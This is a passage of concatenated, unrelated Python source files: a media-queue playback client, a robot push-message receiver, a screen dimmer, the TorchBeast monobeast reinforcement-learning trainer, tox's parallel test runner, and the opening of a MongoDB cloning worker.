resp = requests.head(url + POP_PATH)
if resp.status_code != 200:
print("Unable to find backend at:", url,
file=sys.stderr)
exit(4)
def vprint(msg):
""" Verbose print """
if VERBOSE:
print(msg)
class PlayIt(object):
""" Defines the interface between the backend and actual playback. """
def __init__(self):
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--monitor-number', dest="monitor_number",
type=int, default=1)
parser.add_argument('-s', '--server',
default="http://hubben.chalmers.it:8080")
#parser.add_argument('-v', '--verbose', action='store_true')
args = parser.parse_args()
if args.server is None:
print("Please supply a server by: -s http://www.example.org:port",
file=sys.stderr)
exit(3)
else:
self.server = _fix_server_address(args.server)
vprint("Server: " + self.server)
check_connection(self.server)
self.monitor_number = args.monitor_number
self.print_queue = queue.Queue()
self.map_lock = threading.RLock()
def start_eventloop(self):
""" Start the event-loop. """
cmd_map = {"quit": interrupt_main}
while True:
self.set_cmd_map(cmd_map)
# item = {"nick": "Eda", "artist": ["Daft Punk"], "title": "Face to Face",
# #"externalID": "0fFHjnqpSpV8XuWyCKf6XU"}
# "externalID": "a5uQMwRMHcs"}
# self._play_youtube(item)
# time.sleep(7)
item = self._get_next()
if len(item) > 0:
# Dynamically call the play function based on the media type
func_name = "_play_" + item['type'].lower()
func = getattr(self, func_name)
func(item)
else:
vprint("No item in queue, sleeping...")
time.sleep(7)
def _get_next(self):
""" Get the next item in queue from the backend. """
vprint("Popping next item in the queue")
resp = requests.get(self.server + POP_PATH)
return resp.json()
def _play_youtube(self, item):
""" Play the supplied youtube video with mpv. """
self.print_queue.put("Playing youtube video: " + item['title']
+ " requested by " + item['nick'])
youtube_url = "https://youtu.be/" + item['externalID']
youtube_dl = ["youtube-dl", youtube_url, "-g"]
stream_url = subprocess.check_output(youtube_dl).decode('UTF8').strip()
cmd = ['mpv', '--fs', '--screen',
str(self.monitor_number), stream_url]
# print(cmd)
process = subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def quit():
process.stdin.write(b'q')
process.stdin.flush()
def toggle():
process.stdin.write(b' ')
process.stdin.flush()
# def fseek():
# process.stdin.write(b"\x1b[A")
# process.stdin.flush()
# def bseek():
# process.stdin.write(b"\x1b[B")
# process.stdin.flush()
self.set_cmd_map({"pause": toggle,
"play": toggle,
"stop": quit,
"toggle": toggle,
# "fseek": fseek,
# "bseek": bseek,
"quit": quit})
while process.poll() is None:
time.sleep(1)
def _play_spotify(self, item):
""" Play the supplied spotify track using mopidy and mpc. """
self.print_queue.put("Playing " + ", ".join(item['artist']) + " - "
+ item['title'] + " requested by " + item['nick'])
self._add_to_mopidy('spotify:track:' + item['externalID'])
def _play_soundcloud(self, item):
""" Play SoundCloud items """
self.print_queue.put("Playing " + item['artist'] + " - "
+ item['title'] + " requested by " + item['nick'])
self._add_to_mopidy('soundcloud:song.' + item['externalID'])
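# Illustrative only (not part of the original client): a sketch of how a new
# media type would be added, following the _play_TYPE convention described in
# the module docstring. "vimeo" is a made-up type here and the mpv invocation
# is an assumption; the item fields mirror those used by the handlers above.
#
#     def _play_vimeo(self, item):
#         """ Play a (hypothetical) Vimeo item with mpv. """
#         self.print_queue.put("Playing vimeo video: " + item['title']
#                              + " requested by " + item['nick'])
#         url = "https://vimeo.com/" + item['externalID']
#         subprocess.call(['mpv', '--fs', '--screen',
#                          str(self.monitor_number), url])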
def _add_to_mopidy(self, track_id):
""" Play a mopidy compatible track """
client = MPDClient()
client.connect(MOPIDY_HOST, MOPIDY_PORT)
client.single(1)
client.clear()
try:
client.add(track_id)
client.play(0)
except CommandError as e:
self.print_queue.put("Failed to add song to Mopidy: " + str(e))
client.close()
client.disconnect()
def quit():
mpd_exec("stop")
interrupt_main()
def status():
song = mpd_exec("currentsong")
status = mpd_exec("status")
# TODO: make prettier...
status_line = song['artist'] + ' - ' + song['title'] + '\n' + \
'[' + status['state'] + '] ' + status['elapsed']
self.print_queue.put(status_line)
def toggle():
mpd_exec("pause")
status()
def play():
mpd_exec("play")
def stop():
mpd_exec("stop")
self.set_cmd_map({"pause": toggle,
"play": play,
"stop": stop,
"toggle": toggle,
"quit": quit,
"status": status})
self._mopidy_idle()
def _mopidy_idle(self):
client_idle = MPDClient()
client_idle.connect(MOPIDY_HOST, MOPIDY_PORT)
while client_idle.status()['state'] != "stop":
client_idle.idle()
client_idle.close()
client_idle.disconnect()
def set_cmd_map(self, cmd_map):
""" Set the map of all available commands (with thread lock) """
with self.map_lock:
self.cmd_map = cmd_map
def start_prompt(self):
""" Listen for user input (Like a shell) """
try:
cmd = ""
while cmd != 'quit':
self.print_queue.put('')
cmd = input()
if len(cmd) > 0:
if cmd in self.cmd_map:
self.cmd_map[cmd]()
elif cmd == "help":
keys = list(self.cmd_map.keys())
self.print_queue.put(", ".join(keys))
else:
self.print_queue.put('Unknown command "' + cmd + '"')
# Wait for queues to finish
self.print_queue.join()
except KeyboardInterrupt:
exit(1)
return
def start_printloop(self):
""" Prints everything from the print queue """
while True:
msg = self.print_queue.get()
if msg != '':
msg = msg + '\n'
print("\r" + msg + "> ", end='')
self.print_queue.task_done()
if __name__ == "__main__":
main()
|
robot_msg_push.py
|
from . import logger
import threading
class RobotMsgPush(object):
""" Push message receiver
Listens for push messages on port 40924.
When a message is received, it is parsed and the values are written to the
attributes of the corresponding robot module.
Pushes can be enabled via robot.[robot_module].set_push().
Example:
# receive chassis position pushes from the robot
rm = rmepy.Robot(ip='127.0.0.1')
...
rm.push.start() # start the push receiver thread
rm.chassis.set_push(pos_freq=5) # ask the robot to push chassis position info
sleep(1)
print(rm.chassis.x, rm.chassis.y, rm.chassis.z) # read the chassis position
"""
def __init__(self, robot):
self.robot = robot
self.log = logger.Logger(self)
self.get_push_data = robot.connection.get_push_data
self._receiver_thread = threading.Thread(target=self._receiver_task)
self.running = False
def start(self):
""" Start the push message receiver
Args:
None
Returns:
None
"""
self._receiver_thread.start()
self.log.info("MsgPushReceiver thread started.")
def _receiver_task(self):
"""Message receiving & processing thread
Args:
None
Returns:
None
"""
self.running = True
while self.running and threading.main_thread().is_alive():
msg = self.get_push_data(timeout=2)
if msg:
for idx, m in enumerate(msg.split(';')):
if idx == 0:
module_name, _, attr, *values = m.split()
else:
attr, *values = m.split()
self._process_msg_push(module_name, attr, values)
self.log.debuginfo('Shut down RobotMsgPush thread successfully.')
self.running = False
def _process_type(self, data, type_list):
""" Convert string data into values of the specified type(s)
Args:
data (list/tuple): the data to convert
type_list (list/tuple/type): the target type(s)
If a single type is given, every element of data is converted to that type.
If a list/tuple is given, it must have the same length as data and contain
only types; each element of data is converted to the corresponding type.
Returns:
(list): the converted output, or None if the conversion failed
"""
try:
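# e.g. data=['1.5', '0'] with type_list=[float, bool] -> [1.5, False]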
if isinstance(type_list, (list, tuple)):
data = [f(i) if f != bool else bool(int(i))for i, f in zip(data, type_list)]
else:
data = [type_list(i) if type_list != bool else bool(int(i)) for i in data]
except (TypeError, ValueError) as e:
self.log.warn(
"Error at processing push msg: %s does not match %s" % (data, type_list))
data = None
return data
def _process_msg_push(self, module_name, attr, values):
"""Process a push message
Assign the values parsed from a push message to the attributes of the
corresponding robot module.
Args:
module_name (str)
attr (str)
values (list/tuple)
Returns:
None
"""
# TODO: the if-else chain is a bit ugly, but no better dispatch approach has been found yet :(
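# Example push line (format inferred from the parsing in _receiver_task, so
# treat it as an assumption): "chassis push position 1.0 2.0 ;attitude 0.1 0.2 0.3"
# yields module_name='chassis', attr='position', values=['1.0', '2.0'] for the
# first segment, then attr='attitude', values=['0.1', '0.2', '0.3'] for the second.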
robot = self.robot
if module_name == 'chassis':
if attr == 'position':
values = self._process_type(values, float)
(robot.chassis.x, robot.chassis.y) = values
elif attr == 'attitude':
values = self._process_type(values, float)
(robot.chassis.pitch, robot.chassis.roll, robot.chassis.yaw) = values
elif attr == 'status':
values = self._process_type(values, bool)
(robot.chassis.is_static, robot.chassis.is_uphill, robot.chassis.is_downhill, robot.chassis.is_on_slope, robot.chassis.is_pick_up, robot.chassis.is_slip,
robot.chassis.is_impact_x, robot.chassis.is_impact_y, robot.chassis.is_impact_z, robot.chassis.is_roll_over, robot.chassis.is_hill_static) = values
elif module_name == 'gimbal':
if attr == 'attitude':
values = self._process_type(values, float)
(robot.gimbal.pitch, robot.gimbal.yaw) = values
|
dimmer.py
|
import threading
import time
import logging
class Dimmer(object):
def __init__(self, screen_manager, keyboard_manager, dim_after, off_after, pass_through_buttons):
self._dim_after = dim_after
self._off_after = off_after
self._smgr = screen_manager
self._pass_through_buttons = pass_through_buttons
self._last_activity = time.time()
self._dimmed = False
self._off = False
self._lock = threading.Condition()
keyboard_manager.add_callback(self._on_kbd)
thread = threading.Thread(target=self._check)
thread.daemon = True
thread.start()
def _check(self):
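# Background loop: dim the screen after _dim_after seconds of inactivity,
# turn it off after _off_after seconds, then block on the condition variable
# until _on_kbd() reports new keyboard activity.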
while True:
time.sleep(1)
sla = time.time() - self._last_activity
if self._dim_after is not None and sla > self._dim_after and not self._dimmed:
logging.info("Dimmer: dimming")
self._smgr.dim()
self._dimmed = True
if self._off_after is not None and sla > self._off_after:
logging.info("Dimmer: screen off")
self._smgr.screen_off()
self._dimmed = False
self._off = True
self._lock.acquire()
self._lock.wait()
self._lock.release()
def _on_kbd(self, buttons):
self._last_activity = time.time()
processed = False
logging.info("Dimmer::on_kbd, off:{}, dimmed:{}".format(self._off, self._dimmed))
if self._off:
logging.info("Dimmer: screen on")
self._smgr.screen_on()
self._off = False
processed = len(buttons) == 1 and buttons[0] not in self._pass_through_buttons
if self._dimmed:
logging.info("Dimmer: undimming")
self._smgr.undim()
self._dimmed = False
processed = len(buttons) == 1 and buttons[0] not in self._pass_through_buttons
self._lock.acquire()
self._lock.notify_all()
self._lock.release()
return processed
|
monobeast.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
from torchbeast import atari_wrappers
from torchbeast.core import environment
from torchbeast.core import file_writer
from torchbeast.core import prof
from torchbeast.core import vtrace
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--env", type=str, default="PongNoFrameskip-v4",
help="Gym environment.")
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=100000, type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# yapf: enable
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def compute_baseline_loss(advantages):
return 0.5 * torch.sum(advantages ** 2)
def compute_entropy_loss(logits):
"""Return the entropy loss, i.e., the negative entropy of the policy."""
policy = F.softmax(logits, dim=-1)
log_policy = F.log_softmax(logits, dim=-1)
return torch.sum(policy * log_policy)
def compute_policy_gradient_loss(logits, actions, advantages):
cross_entropy = F.nll_loss(
F.log_softmax(torch.flatten(logits, 0, 1), dim=-1),
target=torch.flatten(actions, 0, 1),
reduction="none",
)
cross_entropy = cross_entropy.view_as(advantages)
return torch.sum(cross_entropy * advantages.detach())
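# For orientation: learn() below combines the three helpers above into the scalar objective
# that is actually backpropagated, weighted by the loss flags:
#   total_loss = pg_loss + flags.baseline_cost * baseline_loss + flags.entropy_cost * entropy_loss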
def act(
flags,
actor_index: int,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
model: torch.nn.Module,
buffers: Buffers,
initial_agent_state_buffers,
):
try:
logging.info("Actor %i started.", actor_index)
timings = prof.Timings() # Keep track of how fast things are.
gym_env = create_env(flags)
seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
gym_env.seed(seed)
env = environment.Environment(gym_env)
env_output = env.initial()
agent_state = model.initial_state(batch_size=1)
agent_output, unused_state = model(env_output, agent_state)
while True:
index = free_queue.get()
if index is None:
break
# Write old rollout end.
for key in env_output:
buffers[key][index][0, ...] = env_output[key]
for key in agent_output:
buffers[key][index][0, ...] = agent_output[key]
for i, tensor in enumerate(agent_state):
initial_agent_state_buffers[index][i][...] = tensor
# Do new rollout.
for t in range(flags.unroll_length):
timings.reset()
with torch.no_grad():
agent_output, agent_state = model(env_output, agent_state)
timings.time("model")
env_output = env.step(agent_output["action"])
timings.time("step")
for key in env_output:
buffers[key][index][t + 1, ...] = env_output[key]
for key in agent_output:
buffers[key][index][t + 1, ...] = agent_output[key]
timings.time("write")
full_queue.put(index)
if actor_index == 0:
logging.info("Actor %i: %s", actor_index, timings.summary())
except KeyboardInterrupt:
pass # Return silently.
except Exception as e:
logging.error("Exception in worker process %i", actor_index)
traceback.print_exc()
print()
raise e
def get_batch(
flags,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
buffers: Buffers,
initial_agent_state_buffers,
timings,
lock=threading.Lock(),
):
with lock:
timings.time("lock")
indices = [full_queue.get() for _ in range(flags.batch_size)]
timings.time("dequeue")
batch = {
key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
}
initial_agent_state = (
torch.cat(ts, dim=1)
for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
)
timings.time("batch")
for m in indices:
free_queue.put(m)
timings.time("enqueue")
batch = {k: t.to(device=flags.device, non_blocking=True) for k, t in batch.items()}
initial_agent_state = tuple(
t.to(device=flags.device, non_blocking=True) for t in initial_agent_state
)
timings.time("device")
return batch, initial_agent_state
def learn(
flags,
actor_model,
model,
batch,
initial_agent_state,
optimizer,
scheduler,
lock=threading.Lock(), # noqa: B008
):
"""Performs a learning (optimization) step."""
with lock:
learner_outputs, unused_state = model(batch, initial_agent_state)
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if flags.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
discounts = (~batch["done"]).float() * flags.discounting
vtrace_returns = vtrace.from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
pg_loss = compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = flags.entropy_cost * compute_entropy_loss(
learner_outputs["policy_logits"]
)
total_loss = pg_loss + baseline_loss + entropy_loss
episode_returns = batch["episode_return"][batch["done"]]
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
}
optimizer.zero_grad()
total_loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping)
optimizer.step()
scheduler.step()
actor_model.load_state_dict(model.state_dict())
return stats
def create_buffers(flags, obs_shape, num_actions) -> Buffers:
T = flags.unroll_length
specs = dict(
frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
reward=dict(size=(T + 1,), dtype=torch.float32),
done=dict(size=(T + 1,), dtype=torch.bool),
episode_return=dict(size=(T + 1,), dtype=torch.float32),
episode_step=dict(size=(T + 1,), dtype=torch.int32),
policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
baseline=dict(size=(T + 1,), dtype=torch.float32),
last_action=dict(size=(T + 1,), dtype=torch.int64),
action=dict(size=(T + 1,), dtype=torch.int64),
)
buffers: Buffers = {key: [] for key in specs}
for _ in range(flags.num_buffers):
for key in buffers:
buffers[key].append(torch.empty(**specs[key]).share_memory_())
return buffers
def train(flags): # pylint: disable=too-many-branches, too-many-statements
if flags.xpid is None:
flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
plogger = file_writer.FileWriter(
xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir
)
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
if flags.num_buffers is None: # Set sensible default for num_buffers.
flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
if flags.num_actors >= flags.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if flags.num_buffers < flags.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = flags.unroll_length
B = flags.batch_size
flags.device = None
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
flags.device = torch.device("cuda")
else:
logging.info("Not using CUDA.")
flags.device = torch.device("cpu")
env = create_env(flags)
model = Net(env.observation_space.shape, env.action_space.n, flags.use_lstm)
buffers = create_buffers(flags, env.observation_space.shape, model.num_actions)
# init sharing mode to allow model tensors to be shared across processes
model.share_memory() # model method
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(flags.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_() # tensor method
initial_agent_state_buffers.append(state)
    # Queues used to pass free/filled rollout-buffer indices between the actor processes and the learner.
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
# setup actor processes
actor_processes = []
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(
flags,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
),
)
actor.start()
actor_processes.append(actor)
learner_model = Net(
env.observation_space.shape, env.action_space.n, flags.use_lstm
).to(device=flags.device)
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
def lr_lambda(epoch):
return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
nonlocal step, stats
timings = prof.Timings()
while step < flags.total_steps:
timings.reset()
batch, agent_state = get_batch(
flags,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings,
)
stats = learn(
flags, model, learner_model, batch, agent_state, optimizer, scheduler
)
timings.time("learn")
with lock:
to_log = dict(step=step)
to_log.update({k: stats[k] for k in stat_keys})
plogger.log(to_log)
step += T * B
if i == 0:
logging.info("Batch and learn: %s", timings.summary())
for m in range(flags.num_buffers):
free_queue.put(m)
threads = []
for i in range(flags.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
def checkpoint():
if flags.disable_checkpoint:
return
logging.info("Saving checkpoint to %s", checkpointpath)
torch.save(
{
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict(),
"flags": vars(flags),
},
checkpointpath,
)
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < flags.total_steps:
start_step = step
start_time = timer()
time.sleep(5)
if timer() - last_checkpoint_time > 10 * 60: # Save every 10 min.
checkpoint()
last_checkpoint_time = timer()
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
total_loss = stats.get("total_loss", float("inf"))
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %sStats:\n%s",
step,
sps,
total_loss,
mean_return,
pprint.pformat(stats),
)
except KeyboardInterrupt:
return # Try joining actors then quit.
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(flags.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
checkpoint()
plogger.close()
def test(flags, num_episodes: int = 10):
if flags.xpid is None:
checkpointpath = "./latest/model.tar"
else:
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
gym_env = create_env(flags)
env = environment.Environment(gym_env)
model = Net(gym_env.observation_space.shape, gym_env.action_space.n, flags.use_lstm)
model.eval()
checkpoint = torch.load(checkpointpath, map_location="cpu")
model.load_state_dict(checkpoint["model_state_dict"])
observation = env.initial()
returns = []
while len(returns) < num_episodes:
if flags.mode == "test_render":
env.gym_env.render()
agent_outputs = model(observation)
policy_outputs, _ = agent_outputs
observation = env.step(policy_outputs["action"])
if observation["done"].item():
returns.append(observation["episode_return"].item())
logging.info(
"Episode ended after %d steps. Return: %.1f",
observation["episode_step"].item(),
observation["episode_return"].item(),
)
env.close()
logging.info(
"Average returns over %i steps: %.1f", num_episodes, sum(returns) / len(returns)
)
class AtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, use_lstm=False):
super(AtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction.
self.conv1 = nn.Conv2d(
in_channels=self.observation_shape[0],
out_channels=32,
kernel_size=8,
stride=4,
)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
# Fully connected layer.
self.fc = nn.Linear(3136, 512)
# FC output size + one-hot of last action + last reward.
core_output_size = self.fc.out_features + num_actions + 1
self.use_lstm = use_lstm
if use_lstm:
self.core = nn.LSTM(core_output_size, core_output_size, 2)
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
if not self.use_lstm:
return tuple()
return tuple(
torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
for _ in range(2)
)
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1) # Merge time and batch.
x = x.float() / 255.0
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(T * B, -1)
x = F.relu(self.fc(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
if self.use_lstm:
core_input = core_input.view(T, B, -1)
core_output_list = []
notdone = (~inputs["done"]).float()
for input, nd in zip(core_input.unbind(), notdone.unbind()):
# Reset core state to zero whenever an episode ended.
# Make `done` broadcastable with (num_layers, B, hidden_size)
# states:
nd = nd.view(1, -1, 1)
core_state = tuple(nd * s for s in core_state)
output, core_state = self.core(input.unsqueeze(0), core_state)
core_output_list.append(output)
core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
else:
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
Net = AtariNet
def create_env(flags):
return atari_wrappers.wrap_pytorch(
atari_wrappers.wrap_deepmind(
atari_wrappers.make_atari(flags.env),
clip_rewards=False,
frame_stack=True,
scale=False,
)
)
def main(flags):
if flags.mode == "train":
train(flags)
else:
test(flags)
if __name__ == "__main__":
flags = parser.parse_args()
main(flags)
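# Illustrative invocations (a sketch, assuming this file is run as a module from the torchbeast
# repository; the flag names come from the argparse definitions above, the values are examples only):
#   python -m torchbeast.monobeast --env PongNoFrameskip-v4 --num_actors 4 --total_steps 100000
#   python -m torchbeast.monobeast --mode test --xpid torchbeast-20200101-000000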
|
parallel.py
|
import os
import sys
from collections import OrderedDict, deque
from threading import Event, Semaphore, Thread
from tox import reporter
from tox.config.parallel import ENV_VAR_KEY as PARALLEL_ENV_VAR_KEY
from tox.exception import InvocationError
from tox.util.main import MAIN_FILE
from tox.util.spinner import Spinner
def run_parallel(config, venv_dict):
"""here we'll just start parallel sub-processes"""
live_out = config.option.parallel_live
args = [sys.executable, MAIN_FILE] + config.args
try:
position = args.index("--")
except ValueError:
position = len(args)
max_parallel = config.option.parallel
if max_parallel is None:
max_parallel = len(venv_dict)
semaphore = Semaphore(max_parallel)
finished = Event()
show_progress = not live_out and reporter.verbosity() > reporter.Verbosity.QUIET
with Spinner(enabled=show_progress) as spinner:
def run_in_thread(tox_env, os_env, processes):
output = None
env_name = tox_env.envconfig.envname
status = "skipped tests" if config.option.notest else None
try:
os_env[str(PARALLEL_ENV_VAR_KEY)] = str(env_name)
args_sub = list(args)
if hasattr(tox_env, "package"):
args_sub.insert(position, str(tox_env.package))
args_sub.insert(position, "--installpkg")
with tox_env.new_action("parallel {}".format(tox_env.name)) as action:
def collect_process(process):
processes[tox_env] = (action, process)
print_out = not live_out and tox_env.envconfig.parallel_show_output
output = action.popen(
args=args_sub,
env=os_env,
redirect=not live_out,
capture_err=live_out,
callback=collect_process,
returnout=print_out,
)
except InvocationError as err:
status = "parallel child exit code {}".format(err.exit_code)
finally:
semaphore.release()
finished.set()
tox_env.status = status
done.add(env_name)
outcome = spinner.succeed
if config.option.notest:
outcome = spinner.skip
elif status is not None:
outcome = spinner.fail
outcome(env_name)
if print_out and output is not None:
reporter.verbosity0(output)
threads = deque()
processes = {}
todo_keys = set(venv_dict.keys())
todo = OrderedDict((n, todo_keys & set(v.envconfig.depends)) for n, v in venv_dict.items())
done = set()
try:
while todo:
for name, depends in list(todo.items()):
if depends - done:
# skip if has unfinished dependencies
continue
del todo[name]
venv = venv_dict[name]
semaphore.acquire(blocking=True)
spinner.add(name)
thread = Thread(
target=run_in_thread, args=(venv, os.environ.copy(), processes)
)
thread.daemon = True
thread.start()
threads.append(thread)
if todo:
# wait until someone finishes and retry queuing jobs
finished.wait()
finished.clear()
while threads:
threads = [
thread for thread in threads if not thread.join(0.1) and thread.is_alive()
]
except KeyboardInterrupt:
reporter.verbosity0(
"[{}] KeyboardInterrupt parallel - stopping children".format(os.getpid())
)
while True:
# do not allow to interrupt until children interrupt
try:
# putting it inside a thread so it's not interrupted
stopper = Thread(target=_stop_child_processes, args=(processes, threads))
stopper.start()
stopper.join()
except KeyboardInterrupt:
continue
raise KeyboardInterrupt
def _stop_child_processes(processes, main_threads):
"""A three level stop mechanism for children - INT (250ms) -> TERM (100ms) -> KILL"""
# first stop children
def shutdown(tox_env, action, process):
action.handle_interrupt(process)
threads = [Thread(target=shutdown, args=(n, a, p)) for n, (a, p) in processes.items()]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# then its threads
for thread in main_threads:
thread.join()
|
Core.py
|
from src.core.service.Mongo import Mongo
from src.core.service.Configuration import Configuration
from src.core.clone.Collection import Collection
from src.core.clone.BasicCollectionPart import BasicCollectionPart
from src.core.clone.OplogCollectionPart import OplogCollectionPart
import multiprocessing as mp
from queue import Empty as QueueEmpty
"""
Function (run in a separate process from the main program) to handle the clone of any CollectionPart
"""
def clone_collection_part(qi, qo, job_id, common_info):
    # Worker entry point: pull CollectionParts from the input queue and clone them until told to stop
print('Process '+str(job_id)+': start to clone CollectionParts.')
Configuration.FILEPATH = common_info['configuration_filepath']
configuration = Configuration()
